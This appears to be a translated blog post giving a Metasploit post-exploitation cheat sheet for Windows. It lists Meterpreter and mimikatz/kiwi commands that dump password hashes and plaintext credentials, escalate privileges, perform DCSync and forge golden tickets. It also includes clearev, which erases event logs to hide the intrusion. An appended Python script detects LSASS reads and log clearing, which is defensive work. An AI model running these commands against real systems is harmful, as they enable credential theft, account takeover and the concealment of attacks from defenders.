
Metasploit

1. Basic

1. Grab the stored auto-login password

run windows/gather/credentials/windows_autologin

2. If you have not escalated privileges yet, this module still attempts a hash dump

run windows/gather/smart_hashdump

3. Privilege escalation

getsystem

4. After escalating, run hashdump to retrieve the password hashes

run hashdump

2. mimikatz module

1. Load the mimikatz module to get at more credentials

Note: the mimikatz module has since been merged into the kiwi module.

load mimikatz

 kerberos: kerberos credential related module
 livessp: try to retrieve livessp credentials
 mimikatz_command: run a custom mimikatz command
 msv: msv credential related module; lists the user password hashes of the target host
 ssp: ssp credential related module
 tspkg: tspkg credential related module
 wdigest: wdigest credential related module

Use the mimikatz_command command to get plaintext passwords

mimikatz_command -f sekurlsa::searchPasswords

3. kiwi module

1. The kiwi module is more powerful than the mimikatz module

load kiwi

 creds_all: list all credentials
 creds_kerberos: list all kerberos credentials
 creds_msv: list all msv credentials
 creds_ssp: list all ssp credentials
 creds_tspkg: list all tspkg credentials
 creds_wdigest: list all wdigest credentials
 dcsync: retrieve user account information via DCSync
 dcsync_ntlm: retrieve a user account's NTLM hash, SID and RID via DCSync
 golden_ticket_create: create a golden ticket
 kerberos_ticket_list: list kerberos tickets
 kerberos_ticket_purge: purge kerberos tickets
 kerberos_ticket_use: use a kerberos ticket
 kiwi_cmd: execute a raw mimikatz command (same syntax as mimikatz.exe)
 lsa_dump_sam: dump the SAM via LSA
 lsa_dump_secrets: dump LSA secrets
 password_change: change a user's password
 wifi_list: list the wifi profiles of the current user
 wifi_list_shared: list shared wifi profiles/codes

2. The creds_all command obtains the credentials directly

creds_all

3. The kiwi_cmd command exposes all of mimikatz's functionality; it is followed by a command in mimikatz.exe syntax

kiwi_cmd sekurlsa::logonpasswords

4. Clear the event logs

clearev
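As an added, defender-side example (not part of the original post): the mimikatz/kiwi credential commands above read LSASS process memory, and clearev wipes the Windows event logs; both leave traces that a log pipeline can catch. The Python below runs two checks over a few constructed JSON-per-line events (Sysmon Event ID 10 ProcessAccess, Security Event ID 1102 and System Event ID 104). The allowlist, file paths and sample events are assumptions.

```python
import json

PROCESS_VM_READ = 0x0010  # access right needed to read LSASS memory

# Hypothetical allowlist of processes that legitimately read LSASS on this host.
LSASS_READER_ALLOWLIST = {
    r"c:\windows\system32\svchost.exe",
    r"c:\windows\system32\csrss.exe",
}

# Constructed sample events, one JSON object per line (not real telemetry).
SAMPLE_LOG = r"""
{"Channel":"Microsoft-Windows-Sysmon/Operational","EventID":10,"SourceImage":"C:\\Windows\\System32\\svchost.exe","TargetImage":"C:\\Windows\\System32\\lsass.exe","GrantedAccess":"0x1010"}
{"Channel":"Microsoft-Windows-Sysmon/Operational","EventID":10,"SourceImage":"C:\\Windows\\Temp\\updater.exe","TargetImage":"C:\\Windows\\System32\\lsass.exe","GrantedAccess":"0x1000"}
{"Channel":"Microsoft-Windows-Sysmon/Operational","EventID":10,"SourceImage":"C:\\Windows\\Temp\\updater.exe","TargetImage":"C:\\Windows\\System32\\lsass.exe","GrantedAccess":"0x1010"}
{"Channel":"Security","EventID":4624,"SubjectUserName":"bob"}
{"Channel":"Security","EventID":1102,"SubjectUserName":"bob"}
{"Channel":"System","EventID":104,"SubjectUserName":"bob"}
"""

def parse_events(text):
    """Parse one JSON event per line, skipping blank lines."""
    return [json.loads(line) for line in text.splitlines() if line.strip()]

def detect(events):
    """Return (rule, detail) tuples for LSASS memory reads and log clearing."""
    alerts = []
    for ev in events:
        channel, eid = ev.get("Channel", ""), ev.get("EventID")
        if channel.endswith("Sysmon/Operational") and eid == 10:
            target = ev.get("TargetImage", "").lower()
            source = ev.get("SourceImage", "").lower()
            access = int(ev.get("GrantedAccess", "0x0"), 16)
            # Query-only access (e.g. 0x1000) is routine; VM_READ on LSASS is not.
            if (target.endswith(r"\lsass.exe") and access & PROCESS_VM_READ
                    and source not in LSASS_READER_ALLOWLIST):
                alerts.append(("lsass_memory_read", f"{source} access={hex(access)}"))
        elif channel == "Security" and eid == 1102:   # "The audit log was cleared"
            alerts.append(("security_log_cleared", ev.get("SubjectUserName", "?")))
        elif channel == "System" and eid == 104:      # "The System log file was cleared"
            alerts.append(("system_log_cleared", ev.get("SubjectUserName", "?")))
    return alerts

if __name__ == "__main__":
    for rule, detail in detect(parse_events(SAMPLE_LOG)):
        print(f"ALERT {rule}: {detail}")
```

Event ID 1102/104 alone cannot distinguish clearev from an administrator clearing logs, so correlate with the user and the preceding LSASS-access alert.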

Source: Xie Gongzi Learns Security

https://www.programmersought.com/article/30017541721/
